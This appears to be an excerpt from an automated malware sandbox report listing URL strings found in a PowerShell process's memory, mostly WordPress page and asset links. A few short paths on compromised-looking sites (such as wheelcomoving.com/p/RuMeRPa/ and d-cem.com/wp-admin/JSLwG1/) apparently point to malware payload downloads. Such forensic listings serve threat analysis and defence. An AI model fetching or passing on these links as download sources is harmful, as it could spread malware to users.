Source: powershell.exe, 00000005.00000002.2223475841.0000000003BAE000.00000004.00000001.sdmp String found in binary or memory: http://ketoresetme.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/vendors-styl
Source: powershell.exe, 00000005.00000002.2222999381.0000000003882000.00000004.00000001.sdmp String found in binary or memory: http://ketoresetme.com/wp-content/pmJ/
Source: powershell.exe, 00000005.00000002.2223475841.0000000003BAE000.00000004.00000001.sdmp String found in binary or memory: http://ketoresetme.com/wp-content/themes/Newspaper/images/icons/ico-video-large.png
Source: powershell.exe, 00000005.00000002.2223475841.0000000003BAE000.00000004.00000001.sdmp String found in binary or memory: http://ketoresetme.com/wp-content/themes/Newspaper/images/icons/video-small.png
Source: powershell.exe, 00000005.00000002.2223475841.0000000003BAE000.00000004.00000001.sdmp String found in binary or memory: http://ketoresetme.com/wp-content/themes/Newspaper/includes/demos/lifestyle/demo_style.css?ver=8.1
Source: powershell.exe, 00000005.00000002.2223475841.0000000003BAE000.00000004.00000001.sdmp String found in binary or memory: http://ketoresetme.com/wp-content/themes/Newspaper/style-woocommerce.css?ver=8.1
Source: powershell.exe, 00000005.00000002.2223475841.0000000003BAE000.00000004.00000001.sdmp String found in binary or memory: http://ketoresetme.com/wp-content/themes/Newspaper/style.css?ver=8.1
Source: powershell.exe, 00000005.00000002.2223475841.0000000003BAE000.00000004.00000001.sdmp String found in binary or memory: http://ketoresetme.com/wp-includes/css/dist/block-library/style.min.css?ver=5.5.3
Source: powershell.exe, 00000005.00000002.2223475841.0000000003BAE000.00000004.00000001.sdmp String found in binary or memory: http://ketoresetme.com/wp-includes/js/jquery/jquery.js?ver=1.12.4-wp
Source: powershell.exe, 00000005.00000002.2223475841.0000000003BAE000.00000004.00000001.sdmp String found in binary or memory: http://ketoresetme.com/wp-includes/wlwmanifest.xml
Source: powershell.exe, 00000005.00000002.2223475841.0000000003BAE000.00000004.00000001.sdmp String found in binary or memory: http://ketoresetme.com/xmlrpc.php
Source: powershell.exe, 00000005.00000002.2223475841.0000000003BAE000.00000004.00000001.sdmp String found in binary or memory: http://ketoresetme.comx
Source: powershell.exe, 00000005.00000002.2223475841.0000000003BAE000.00000004.00000001.sdmp String found in binary or memory: http://schema.org/WebPage
Source: powershell.exe, 00000005.00000002.2218306203.0000000002330000.00000002.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: powershell.exe, 00000005.00000002.2223624396.0000000003C45000.00000004.00000001.sdmp String found in binary or memory: http://thebestfikrah.com
Source: powershell.exe, 00000005.00000002.2222999381.0000000003882000.00000004.00000001.sdmp String found in binary or memory: http://thebestfikrah.com/wp-admin/fOIlVX/
Source: powershell.exe, 00000005.00000002.2223624396.0000000003C45000.00000004.00000001.sdmp String found in binary or memory: http://thebestfikrah.com/wp-content/plugins/LayerSlider/assets/static/layerslider/css/layerslider.cs
Source: powershell.exe, 00000005.00000002.2223624396.0000000003C45000.00000004.00000001.sdmp String found in binary or memory: http://thebestfikrah.com/wp-content/plugins/LayerSlider/assets/static/layerslider/js/layerslider.kre
Source: powershell.exe, 00000005.00000002.2223624396.0000000003C45000.00000004.00000001.sdmp String found in binary or memory: http://thebestfikrah.com/wp-content/plugins/LayerSlider/assets/static/layerslider/js/layerslider.tra
Source: powershell.exe, 00000005.00000002.2223624396.0000000003C45000.00000004.00000001.sdmp String found in binary or memory: http://thebestfikrah.com/wp-content/plugins/LayerSlider/assets/static/layerslider/js/layerslider.uti
Source: powershell.exe, 00000005.00000002.2223624396.0000000003C45000.00000004.00000001.sdmp String found in binary or memory: http://thebestfikrah.com/wp-content/plugins/acurax-social-media-widget/css/style.css?v=3.2.10&#038;v
Source: powershell.exe, 00000005.00000002.2223624396.0000000003C45000.00000004.00000001.sdmp String found in binary or memory: http://thebestfikrah.com/wp-content/plugins/awsm-team/css/team.min.css?ver=1.2.1
Source: powershell.exe, 00000005.00000002.2223624396.0000000003C45000.00000004.00000001.sdmp String found in binary or memory: http://thebestfikrah.com/wp-content/plugins/awsm-team/js/team.min.js?ver=1.2.1
Source: powershell.exe, 00000005.00000002.2223624396.0000000003C45000.00000004.00000001.sdmp String found in binary or memory: http://thebestfikrah.com/wp-content/plugins/easy-accordion-free/public/assets/css/ea-style.css?ver=2
Source: powershell.exe, 00000005.00000002.2223624396.0000000003C45000.00000004.00000001.sdmp String found in binary or memory: http://thebestfikrah.com/wp-content/plugins/easy-accordion-free/public/assets/css/font-awesome.min.c
Source: powershell.exe, 00000005.00000002.2223624396.0000000003C45000.00000004.00000001.sdmp String found in binary or memory: http://thebestfikrah.com/wp-content/plugins/elementor-pro/assets/css/frontend.min.css?ver=3.0.9
Source: powershell.exe, 00000005.00000002.2223624396.0000000003C45000.00000004.00000001.sdmp String found in binary or memory: http://thebestfikrah.com/wp-content/plugins/elementor-pro/assets/js/frontend.min.js?ver=3.0.9
Source: powershell.exe, 00000005.00000002.2223624396.0000000003C45000.00000004.00000001.sdmp String found in binary or memory: http://thebestfikrah.com/wp-content/plugins/elementor-pro/assets/lib/smartmenus/jquery.smartmenus.mi
Source: powershell.exe, 00000005.00000002.2223624396.0000000003C45000.00000004.00000001.sdmp String found in binary or memory: http://thebestfikrah.com/wp-content/plugins/elementor-pro/assets/lib/sticky/jquery.sticky.min.js?ver
Source: powershell.exe, 00000005.00000002.2223624396.0000000003C45000.00000004.00000001.sdmp String found in binary or memory: http://thebestfikrah.com/wp-content/plugins/elementor/assets/css/frontend-legacy.min.css?ver=3.0.15
Source: powershell.exe, 00000005.00000002.2223624396.0000000003C45000.00000004.00000001.sdmp String found in binary or memory: http://thebestfikrah.com/wp-content/plugins/elementor/assets/css/frontend.min.css?ver=3.0.15
Source: powershell.exe, 00000005.00000002.2223624396.0000000003C45000.00000004.00000001.sdmp String found in binary or memory: http://thebestfikrah.com/wp-content/plugins/elementor/assets/js/frontend-modules.min.js?ver=3.0.15
Source: powershell.exe, 00000005.00000002.2223624396.0000000003C45000.00000004.00000001.sdmp String found in binary or memory: http://thebestfikrah.com/wp-content/plugins/elementor/assets/lib/animations/animations.min.css?ver=3
Source: powershell.exe, 00000005.00000002.2223624396.0000000003C45000.00000004.00000001.sdmp String found in binary or memory: http://thebestfikrah.com/wp-content/plugins/elementor/assets/lib/dialog/dialog.min.js?ver=4.8.1
Source: powershell.exe, 00000005.00000002.2223624396.0000000003C45000.00000004.00000001.sdmp String found in binary or memory: http://thebestfikrah.com/wp-content/plugins/elementor/assets/lib/eicons/css/elementor-icons.min.css?
Source: powershell.exe, 00000005.00000002.2223624396.0000000003C45000.00000004.00000001.sdmp String found in binary or memory: http://thebestfikrah.com/wp-content/plugins/elementor/assets/lib/font-awesome/css/brands.min.css?ver
Source: powershell.exe, 00000005.00000002.2223624396.0000000003C45000.00000004.00000001.sdmp String found in binary or memory: http://thebestfikrah.com/wp-content/plugins/elementor/assets/lib/font-awesome/css/fontawesome.min.cs
Source: powershell.exe, 00000005.00000002.2223624396.0000000003C45000.00000004.00000001.sdmp String found in binary or memory: http://thebestfikrah.com/wp-content/plugins/elementor/assets/lib/font-awesome/css/solid.min.css?ver=
Source: powershell.exe, 00000005.00000002.2223624396.0000000003C45000.00000004.00000001.sdmp String found in binary or memory: http://thebestfikrah.com/wp-content/plugins/elementor/assets/lib/share-link/share-link.min.js?ver=3.
Source: powershell.exe, 00000005.00000002.2223624396.0000000003C45000.00000004.00000001.sdmp String found in binary or memory: http://thebestfikrah.com/wp-content/plugins/elementor/assets/lib/swiper/swiper.min.js?ver=5.3.6
Source: powershell.exe, 00000005.00000002.2223624396.0000000003C45000.00000004.00000001.sdmp String found in binary or memory: http://thebestfikrah.com/wp-content/plugins/elementor/assets/lib/waypoints/waypoints.min.js?ver=4.0.
Source: powershell.exe, 00000005.00000002.2223624396.0000000003C45000.00000004.00000001.sdmp String found in binary or memory: http://thebestfikrah.com/wp-content/plugins/genesis-blocks/dist/assets/fontawesome/css/all.min.css?v
Source: powershell.exe, 00000005.00000002.2223624396.0000000003C45000.00000004.00000001.sdmp String found in binary or memory: http://thebestfikrah.com/wp-content/plugins/genesis-blocks/dist/assets/js/dismiss.js?ver=1609898690
Source: powershell.exe, 00000005.00000002.2223624396.0000000003C45000.00000004.00000001.sdmp String found in binary or memory: http://thebestfikrah.com/wp-content/plugins/genesis-blocks/dist/blocks.style.build.css?ver=160989868
Source: powershell.exe, 00000005.00000002.2223624396.0000000003C45000.00000004.00000001.sdmp String found in binary or memory: http://thebestfikrah.com/wp-content/plugins/google-analytics-dashboard-for-wp/assets/css/frontend.mi
Source: powershell.exe, 00000005.00000002.2223624396.0000000003C45000.00000004.00000001.sdmp String found in binary or memory: http://thebestfikrah.com/wp-content/plugins/google-analytics-dashboard-for-wp/assets/js/frontend.min
Source: powershell.exe, 00000005.00000002.2223624396.0000000003C45000.00000004.00000001.sdmp String found in binary or memory: http://thebestfikrah.com/wp-content/plugins/rocket-lazy-load/assets/img/youtube.png)
Source: powershell.exe, 00000005.00000002.2223624396.0000000003C45000.00000004.00000001.sdmp String found in binary or memory: http://thebestfikrah.com/wp-content/plugins/simple-download-monitor/css/sdm_wp_styles.css?ver=5.6
Source: powershell.exe, 00000005.00000002.2223624396.0000000003C45000.00000004.00000001.sdmp String found in binary or memory: http://thebestfikrah.com/wp-content/plugins/simple-download-monitor/js/sdm_wp_scripts.js?ver=5.6
Source: powershell.exe, 00000005.00000002.2223624396.0000000003C45000.00000004.00000001.sdmp String found in binary or memory: http://thebestfikrah.com/wp-content/plugins/wordpress-popular-posts/assets/css/wpp.css?ver=5.2.4
Source: powershell.exe, 00000005.00000002.2223624396.0000000003C45000.00000004.00000001.sdmp String found in binary or memory: http://thebestfikrah.com/wp-content/plugins/wordpress-popular-posts/assets/js/wpp.min.js?ver=5.2.4
Source: powershell.exe, 00000005.00000002.2223624396.0000000003C45000.00000004.00000001.sdmp String found in binary or memory: http://thebestfikrah.com/wp-content/plugins/wp-smushit/app/assets/js/smush-lazy-load.min.js?ver=3.8.
Source: powershell.exe, 00000005.00000002.2223624396.0000000003C45000.00000004.00000001.sdmp String found in binary or memory: http://thebestfikrah.com/wp-content/plugins/wp-video-posts/css/style.css?ver=5.6
Source: powershell.exe, 00000005.00000002.2223624396.0000000003C45000.00000004.00000001.sdmp String found in binary or memory: http://thebestfikrah.com/wp-content/plugins/wp-video-posts/inc/video-js/video-js.min.css?ver=5.6
Source: powershell.exe, 00000005.00000002.2223624396.0000000003C45000.00000004.00000001.sdmp String found in binary or memory: http://thebestfikrah.com/wp-content/plugins/wp-video-posts/inc/video-js/video.js
Source: powershell.exe, 00000005.00000002.2223624396.0000000003C45000.00000004.00000001.sdmp String found in binary or memory: http://thebestfikrah.com/wp-content/plugins/wp-video-posts/inc/video-js/vjs.youtube.js
Source: powershell.exe, 00000005.00000002.2223624396.0000000003C45000.00000004.00000001.sdmp String found in binary or memory: http://thebestfikrah.com/wp-content/plugins/wp-video-posts/js/wpvp-front-end.js
Source: powershell.exe, 00000005.00000002.2223624396.0000000003C45000.00000004.00000001.sdmp String found in binary or memory: http://thebestfikrah.com/wp-content/themes/oceanwp/assets/css/style.min.css?ver=2.0.2
Source: powershell.exe, 00000005.00000002.2223624396.0000000003C45000.00000004.00000001.sdmp String found in binary or memory: http://thebestfikrah.com/wp-content/themes/oceanwp/assets/css/third/magnific-popup.min.css?ver=1.0.0
Source: powershell.exe, 00000005.00000002.2223624396.0000000003C45000.00000004.00000001.sdmp String found in binary or memory: http://thebestfikrah.com/wp-content/themes/oceanwp/assets/css/third/simple-line-icons.min.css?ver=2.
Source: powershell.exe, 00000005.00000002.2223624396.0000000003C45000.00000004.00000001.sdmp String found in binary or memory: http://thebestfikrah.com/wp-content/themes/oceanwp/assets/css/third/slick.min.css?ver=1.6.0
Source: powershell.exe, 00000005.00000002.2223624396.0000000003C45000.00000004.00000001.sdmp String found in binary or memory: http://thebestfikrah.com/wp-content/themes/oceanwp/assets/fonts/fontawesome/css/all.min.css?ver=5.15
Source: powershell.exe, 00000005.00000002.2223624396.0000000003C45000.00000004.00000001.sdmp String found in binary or memory: http://thebestfikrah.com/wp-content/themes/oceanwp/assets/js/main.min.js?ver=2.0.2
Source: powershell.exe, 00000005.00000002.2223624396.0000000003C45000.00000004.00000001.sdmp String found in binary or memory: http://thebestfikrah.com/wp-content/themes/oceanwp/assets/js/third/html5.min.js?ver=2.0.2
Source: powershell.exe, 00000005.00000002.2223624396.0000000003C45000.00000004.00000001.sdmp String found in binary or memory: http://thebestfikrah.com/wp-content/themes/oceanwp/assets/js/third/lightbox.min.js?ver=2.0.2
Source: powershell.exe, 00000005.00000002.2223624396.0000000003C45000.00000004.00000001.sdmp String found in binary or memory: http://thebestfikrah.com/wp-content/themes/oceanwp/assets/js/third/magnific-popup.min.js?ver=2.0.2
Source: powershell.exe, 00000005.00000002.2223624396.0000000003C45000.00000004.00000001.sdmp String found in binary or memory: http://thebestfikrah.com/wp-content/uploads/elementor/css/global.css?ver=1609897380
Source: powershell.exe, 00000005.00000002.2223624396.0000000003C45000.00000004.00000001.sdmp String found in binary or memory: http://thebestfikrah.com/wp-content/uploads/elementor/css/post-102734.css?ver=1609897376
Source: powershell.exe, 00000005.00000002.2223624396.0000000003C45000.00000004.00000001.sdmp String found in binary or memory: http://thebestfikrah.com/wp-content/uploads/elementor/css/post-102751.css?ver=1609897384
Source: powershell.exe, 00000005.00000002.2223624396.0000000003C45000.00000004.00000001.sdmp String found in binary or memory: http://thebestfikrah.com/wp-content/uploads/elementor/css/post-103233.css?ver=1609897381
Source: powershell.exe, 00000005.00000002.2223624396.0000000003C45000.00000004.00000001.sdmp String found in binary or memory: http://thebestfikrah.com/wp-includes/css/dist/block-library/style.min.css?ver=5.6
Source: powershell.exe, 00000005.00000002.2223624396.0000000003C45000.00000004.00000001.sdmp String found in binary or memory: http://thebestfikrah.com/wp-includes/css/dist/block-library/theme.min.css?ver=5.6
Source: powershell.exe, 00000005.00000002.2223624396.0000000003C45000.00000004.00000001.sdmp String found in binary or memory: http://thebestfikrah.com/wp-includes/js/imagesloaded.min.js?ver=4.1.4
Source: powershell.exe, 00000005.00000002.2223624396.0000000003C45000.00000004.00000001.sdmp String found in binary or memory: http://thebestfikrah.com/wp-includes/js/jquery/j
Source: powershell.exe, 00000005.00000002.2223624396.0000000003C45000.00000004.00000001.sdmp String found in binary or memory: http://thebestfikrah.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=3.3.2
Source: powershell.exe, 00000005.00000002.2223624396.0000000003C45000.00000004.00000001.sdmp String found in binary or memory: http://thebestfikrah.com/wp-includes/js/jquery/jquery.min.js?ver=3.5.1
Source: powershell.exe, 00000005.00000002.2223624396.0000000003C45000.00000004.00000001.sdmp String found in binary or memory: http://thebestfikrah.com/wp-includes/js/jquery/ui/core.min.js?ver=1.12.1
Source: powershell.exe, 00000005.00000002.2223624396.0000000003C45000.00000004.00000001.sdmp String found in binary or memory: http://thebestfikrah.com/wp-includes/js/wp-embed.min.js?ver=5.6
Source: powershell.exe, 00000005.00000002.2223624396.0000000003C45000.00000004.00000001.sdmp String found in binary or memory: http://thebestfikrah.com/wp-includes/wlwmanifest.xml
Source: powershell.exe, 00000005.00000002.2222999381.0000000003882000.00000004.00000001.sdmp, powershell.exe, 00000005.00000002.2223421947.0000000003B71000.00000004.00000001.sdmp String found in binary or memory: http://wheelcomoving.com
Source: powershell.exe, 00000005.00000002.2222999381.0000000003882000.00000004.00000001.sdmp, powershell.exe, 00000005.00000002.2219130690.000000000297B000.00000004.00000001.sdmp String found in binary or memory: http://wheelcomoving.com/p/RuMeRPa/
Source: powershell.exe, 00000005.00000002.2223421947.0000000003B71000.00000004.00000001.sdmp String found in binary or memory: http://wheelcomoving.com/wp-content/plugins/bt_cost_calculator/cc.main.js?ver=5.6
Source: powershell.exe, 00000005.00000002.2223421947.0000000003B71000.00000004.00000001.sdmp String found in binary or memory: http://wheelcomoving.com/wp-content/plugins/bt_cost_calculator/jquery.dd.js?ver=5.6
Source: powershell.exe, 00000005.00000002.2223421947.0000000003B71000.00000004.00000001.sdmp String found in binary or memory: http://wheelcomoving.com/wp-content/plugins/bt_cost_calculator/style.min.css?ver=5.6
Source: powershell.exe, 00000005.00000002.2223421947.0000000003B71000.00000004.00000001.sdmp String found in binary or memory: http://wheelcomoving.com/wp-content/plugins/cargo/bt_elements.js?ver=5.6
Source: powershell.exe, 00000005.00000002.2223421947.0000000003B71000.00000004.00000001.sdmp String found in binary or memory: http://wheelcomoving.com/wp-content/plugins/contact-form-7/includes/css/styles.css?ver=5.3.2
Source: powershell.exe, 00000005.00000002.2223421947.0000000003B71000.00000004.00000001.sdmp String found in binary or memory: http://wheelcomoving.com/wp-content/plugins/contact-form-7/includes/js/scripts.js?ver=5.3.2
Source: powershell.exe, 00000005.00000002.2223421947.0000000003B71000.00000004.00000001.sdmp String found in binary or memory: http://wheelcomoving.com/wp-content/plugins/wpcargo/admin/assets/css/jquery.datetimepicker.min.css?v
Source: powershell.exe, 00000005.00000002.2223421947.0000000003B71000.00000004.00000001.sdmp String found in binary or memory: http://wheelcomoving.com/wp-content/plugins/wpcargo/admin/assets/js/jquery.datetimepicker.full.min.j
Source: powershell.exe, 00000005.00000002.2223421947.0000000003B71000.00000004.00000001.sdmp String found in binary or memory: http://wheelcomoving.com/wp-content/plugins/wpcargo/assets/css/fontawesome.min.css?ver=6.7.4
Source: powershell.exe, 00000005.00000002.2223421947.0000000003B71000.00000004.00000001.sdmp String found in binary or memory: http://wheelcomoving.com/wp-content/plugins/wpcargo/assets/css/main.min.css?ver=6.7.4
Source: powershell.exe, 00000005.00000002.2223421947.0000000003B71000.00000004.00000001.sdmp String found in binary or memory: http://wheelcomoving.com/wp-content/plugins/wpcargo/assets/css/wpcargo-style.css?ver=6.7.4
Source: powershell.exe, 00000005.00000002.2223421947.0000000003B71000.00000004.00000001.sdmp String found in binary or memory: http://wheelcomoving.com/wp-content/plugins/wpcargo/assets/js/wpcargo.js?ver=6.7.4
Source: powershell.exe, 00000005.00000002.2223421947.0000000003B71000.00000004.00000001.sdmp String found in binary or memory: http://wheelcomoving.com/wp-content/themes/cargo
Source: powershell.exe, 00000005.00000002.2223421947.0000000003B71000.00000004.00000001.sdmp String found in binary or memory: http://wheelcomoving.com/wp-content/themes/cargo/gfx/plug.png);
Source: powershell.exe, 00000005.00000002.2223421947.0000000003B71000.00000004.00000001.sdmp String found in binary or memory: http://wheelcomoving.com/wp-content/themes/cargo/js/dir.hover.js?ver=5.6
Source: powershell.exe, 00000005.00000002.2223421947.0000000003B71000.00000004.00000001.sdmp String found in binary or memory: http://wheelcomoving.com/wp-content/themes/cargo/js/fancySelect.js?ver=5.6
Source: powershell.exe, 00000005.00000002.2223421947.0000000003B71000.00000004.00000001.sdmp String found in binary or memory: http://wheelcomoving.com/wp-content/themes/cargo/js/header.misc.js?ver=5.6
Source: powershell.exe, 00000005.00000002.2223421947.0000000003B71000.00000004.00000001.sdmp String found in binary or memory: http://wheelcomoving.com/wp-content/themes/cargo/js/jquery.magnific-popup.min.js?ver=5.6
Source: powershell.exe, 00000005.00000002.2223421947.0000000003B71000.00000004.00000001.sdmp String found in binary or memory: http://wheelcomoving.com/wp-content/themes/cargo/js/misc.js?ver=5.6
Source: powershell.exe, 00000005.00000002.2223421947.0000000003B71000.00000004.00000001.sdmp String found in binary or memory: http://wheelcomoving.com/wp-content/themes/cargo/js/slick.min.js?ver=5.6
Source: powershell.exe, 00000005.00000002.2223421947.0000000003B71000.00000004.00000001.sdmp String found in binary or memory: http://wheelcomoving.com/wp-content/themes/cargo/js/sliders.js?ver=5.6
Source: powershell.exe, 00000005.00000002.2223421947.0000000003B71000.00000004.00000001.sdmp String found in binary or memory: http://wheelcomoving.com/wp-content/themes/cargo/style.css?ver=5.6
Source: powershell.exe, 00000005.00000002.2223421947.0000000003B71000.00000004.00000001.sdmp String found in binary or memory: http://wheelcomoving.com/wp-includes/css/dist/block-library/style.min.css?ver=5.6
Source: powershell.exe, 00000005.00000002.2223421947.0000000003B71000.00000004.00000001.sdmp String found in binary or memory: http://wheelcomoving.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=3.3.2
Source: powershell.exe, 00000005.00000002.2223421947.0000000003B71000.00000004.00000001.sdmp String found in binary or memory: http://wheelcomoving.com/wp-includes/js/jquery/jquery.min.js?ver=3.5.1
Source: powershell.exe, 00000005.00000002.2223421947.0000000003B71000.00000004.00000001.sdmp String found in binary or memory: http://wheelcomoving.com/wp-includes/js/wp-embed.min.js?ver=5.6
Source: powershell.exe, 00000005.00000002.2223421947.0000000003B71000.00000004.00000001.sdmp String found in binary or memory: http://wheelcomoving.com/wp-includes/wlwmanifest.xml
Source: powershell.exe, 00000005.00000002.2218306203.0000000002330000.00000002.00000001.sdmp String found in binary or memory: http://www.%s.comPA
Source: powershell.exe, 00000005.00000002.2217476466.0000000000394000.00000004.00000020.sdmp String found in binary or memory: http://www.piriform.com/ccleaner
Source: powershell.exe, 00000005.00000002.2217476466.0000000000394000.00000004.00000020.sdmp String found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
Source: powershell.exe, 00000005.00000002.2223475841.0000000003BAE000.00000004.00000001.sdmp String found in binary or memory: https://anybunny.mobi/
Source: powershell.exe, 00000005.00000002.2223421947.0000000003B71000.00000004.00000001.sdmp String found in binary or memory: https://api.w.org/
Source: powershell.exe, 00000005.00000002.2223475841.0000000003BAE000.00000004.00000001.sdmp String found in binary or memory: https://arabysexy.mobi/
Source: powershell.exe, 00000005.00000002.2223624396.0000000003C45000.00000004.00000001.sdmp String found in binary or memory: https://connect.facebook.net/en_US/fbevents.js
Source: powershell.exe, 00000005.00000002.2223573753.0000000003C23000.00000004.00000001.sdmp String found in binary or memory: https://d-cem.com
Source: powershell.exe, 00000005.00000002.2222999381.0000000003882000.00000004.00000001.sdmp String found in binary or memory: https://d-cem.com/wp-admin/JSLwG1/
Source: powershell.exe, 00000005.00000002.2223624396.0000000003C45000.00000004.00000001.sdmp String found in binary or memory: https://d-cem.comp
Source: powershell.exe, 00000005.00000002.2223624396.0000000003C45000.00000004.00000001.sdmp String found in binary or memory: https://developers.google.com/analytics/devguides/collection/analyticsjs/
Source: powershell.exe, 00000005.00000002.2223475841.0000000003BAE000.00000004.00000001.sdmp String found in binary or memory: https://dirtyindianporn.info/
Source: powershell.exe, 00000005.00000002.2223421947.0000000003B71000.00000004.00000001.sdmp String found in binary or memory: https://fonts.googleapis.com/css?family=Raleway%3A100%2C200%2C300%2C400%2C500%2C600%2C700%2C800%2C90
Source: powershell.exe, 00000005.00000002.2223624396.0000000003C45000.00000004.00000001.sdmp String found in binary or memory: https://fonts.googleapis.com/css?family=Roboto%3A100%2C100italic%2C200%2C200italic%2C300%2C300italic
Source: powershell.exe, 00000005.00000002.2223475841.0000000003BAE000.00000004.00000001.sdmp String found in binary or memory: https://freejavporn.mobi/
Source: powershell.exe, 00000005.00000002.2223624396.0000000003C45000.00000004.00000001.sdmp String found in binary or memory: https://gmpg.org/xfn/11
Source: powershell.exe, 00000005.00000002.2223475841.0000000003BAE000.00000004.00000001.sdmp String found in binary or memory: https://go-indian.pro/
Source: powershell.exe, 00000005.00000002.2223475841.0000000003BAE000.00000004.00000001.sdmp String found in binary or memory: https://hindiporn.pro/
Source: powershell.exe, 00000005.00000002.2223475841.0000000003BAE000.00000004.00000001.sdmp String found in binary or memory: https://hotindianporn.mobi/
Source: powershell.exe, 00000005.00000002.2223421947.0000000003B71000.00000004.00000001.sdmp String found in binary or memory: https://i.ytimg.com/vi/ID/hqdefault.jpg
Source: powershell.exe, 00000005.00000002.2223475841.0000000003BAE000.00000004.00000001.sdmp String found in binary or memory: https://indianpornmovies.info/
Source: powershell.exe, 00000005.00000002.2223475841.0000000003BAE000.00000004.00000001.sdmp String found in binary or memory: https://kashtanka.tv/
Source: powershell.exe, 00000005.00000002.2223475841.0000000003BAE000.00000004.00000001.sdmp String found in binary or memory: https://ketoresetme.com/
Source: powershell.exe, 00000005.00000002.2223475841.0000000003BAE000.00000004.00000001.sdmp String found in binary or memory: https://ketoresetme.com/2021/01/06/keto-reset-instant-pot-cookbook-trailer/
Source: powershell.exe, 00000005.00000002.2223475841.0000000003BAE000.00000004.00000001.sdmp String found in binary or memory: https://ketoresetme.com/2021/01/07/beyond-keto-virtual-summit-the-mid-life-re-life-blueprint-program
Source: powershell.exe, 00000005.00000002.2223475841.0000000003BAE000.00000004.00000001.sdmp String found in binary or memory: https://ketoresetme.com/2021/01/07/keto-full-day-of-eating-keto-bakes-biscuits-keto-chow/
Source: powershell.exe, 00000005.00000002.2223475841.0000000003BAE000.00000004.00000001.sdmp String found in binary or memory: https://ketoresetme.com/2021/01/07/keto-full-day-of-eating-keto-bakes-biscuits-keto-chow/#respond
Source: powershell.exe, 00000005.00000002.2223475841.0000000003BAE000.00000004.00000001.sdmp String found in binary or memory: https://ketoresetme.com/2021/01/07/my-southern-keto-kitchen-cookbook-how-i-got-here/
Source: powershell.exe, 00000005.00000002.2223475841.0000000003BAE000.00000004.00000001.sdmp String found in binary or memory: https://ketoresetme.com/2021/01/07/my-southern-keto-kitchen-cookbook-how-i-got-here/#respond
Source: powershell.exe, 00000005.00000002.2223475841.0000000003BAE000.00000004.00000001.sdmp String found in binary or memory: https://ketoresetme.com/2021/01/07/pepito-manaloto-keto-diet-sagot-sa-katabaan-ni-mara/
Source: powershell.exe, 00000005.00000002.2223475841.0000000003BAE000.00000004.00000001.sdmp String found in binary or memory: https://ketoresetme.com/2021/01/07/pepito-manaloto-keto-diet-sagot-sa-katabaan-ni-mara/#respond
Source: powershell.exe, 00000005.00000002.2223475841.0000000003BAE000.00000004.00000001.sdmp String found in binary or memory: https://ketoresetme.com/2021/01/07/the-ketonian-cookbook-quick-and-easy-low-carb/
Source: powershell.exe, 00000005.00000002.2223475841.0000000003BAE000.00000004.00000001.sdmp String found in binary or memory: https://ketoresetme.com/2021/01/07/what-i-eat-to-lose-weight-2020-easy-keto-recipes-keto-full-day-ea
Source: powershell.exe, 00000005.00000002.2223475841.0000000003BAE000.00000004.00000001.sdmp String found in binary or memory: https://ketoresetme.com/2021/01/07/what-to-avoid-on-a-ketogenic-diet-what-is-ketogenic-diet/
Source: powershell.exe, 00000005.00000002.2223475841.0000000003BAE000.00000004.00000001.sdmp String found in binary or memory: https://ketoresetme.com/2021/01/07/what-to-avoid-on-a-ketogenic-diet-what-is-ketogenic-diet/#respond
Source: powershell.exe, 00000005.00000002.2223475841.0000000003BAE000.00000004.00000001.sdmp String found in binary or memory: https://ketoresetme.com/about-us/
Source: powershell.exe, 00000005.00000002.2223475841.0000000003BAE000.00000004.00000001.sdmp String found in binary or memory: https://ketoresetme.com/author/admin/
Source: powershell.exe, 00000005.00000002.2223475841.0000000003BAE000.00000004.00000001.sdmp String found in binary or memory: https://ketoresetme.com/category/eating-keto-style/
Source: powershell.exe, 00000005.00000002.2223475841.0000000003BAE000.00000004.00000001.sdmp String found in binary or memory: https://ketoresetme.com/category/food-receipes/
Source: powershell.exe, 00000005.00000002.2223475841.0000000003BAE000.00000004.00000001.sdmp String found in binary or memory: https://ketoresetme.com/category/health/
Source: powershell.exe, 00000005.00000002.2223475841.0000000003BAE000.00000004.00000001.sdmp String found in binary or memory: https://ketoresetme.com/category/keto-cookbook/
Source: powershell.exe, 00000005.00000002.2223475841.0000000003BAE000.00000004.00000001.sdmp String found in binary or memory: https://ketoresetme.com/category/keto-diet/
Source: powershell.exe, 00000005.00000002.2223475841.0000000003BAE000.00000004.00000001.sdmp String found in binary or memory: https://ketoresetme.com/category/keto-news/
Source: powershell.exe, 00000005.00000002.2223475841.0000000003BAE000.00000004.00000001.sdmp String found in binary or memory: https://ketoresetme.com/category/keto-summit/
Source: powershell.exe, 00000005.00000002.2223475841.0000000003BAE000.00000004.00000001.sdmp String found in binary or memory: https://ketoresetme.com/category/keto/
Source: powershell.exe, 00000005.00000002.2223475841.0000000003BAE000.00000004.00000001.sdmp String found in binary or memory: https://ketoresetme.com/category/weight-loss/
Source: powershell.exe, 00000005.00000002.2223475841.0000000003BAE000.00000004.00000001.sdmp String found in binary or memory: https://ketoresetme.com/comments/feed/
Source: powershell.exe, 00000005.00000002.2223475841.0000000003BAE000.00000004.00000001.sdmp String found in binary or memory: https://ketoresetme.com/contact-us/
Source: powershell.exe, 00000005.00000002.2223475841.0000000003BAE000.00000004.00000001.sdmp String found in binary or memory: https://ketoresetme.com/feed/
Source: powershell.exe, 00000005.00000002.2223475841.0000000003BAE000.00000004.00000001.sdmp String found in binary or memory: https://ketoresetme.com/privacy-policy-2/
Source: powershell.exe, 00000005.00000002.2223475841.0000000003BAE000.00000004.00000001.sdmp String found in binary or memory: https://ketoresetme.com/shop/
Source: powershell.exe, 00000005.00000002.2223475841.0000000003BAE000.00000004.00000001.sdmp String found in binary or memory: https://ketoresetme.com/wp-content/uploads/2020/09/11.jpg
Source: powershell.exe, 00000005.00000002.2223475841.0000000003BAE000.00000004.00000001.sdmp String found in binary or memory: https://ketoresetme.com/wp-content/uploads/2020/09/12.jpg
Source: powershell.exe, 00000005.00000002.2223475841.0000000003BAE000.00000004.00000001.sdmp String found in binary or memory: https://ketoresetme.com/wp-content/uploads/2020/09/reclama-lifestyle.jpg
Source: powershell.exe, 00000005.00000002.2223475841.0000000003BAE000.00000004.00000001.sdmp String found in binary or memory: https://ketoresetme.com/wp-content/uploads/2020/09/ttt.png
Source: powershell.exe, 00000005.00000002.2223475841.0000000003BAE000.00000004.00000001.sdmp String found in binary or memory: https://ketoresetme.com/wp-content/uploads/2021/01/Beyond-Keto-Virtual-Summit-The-Mid-Life-Re-Life-B
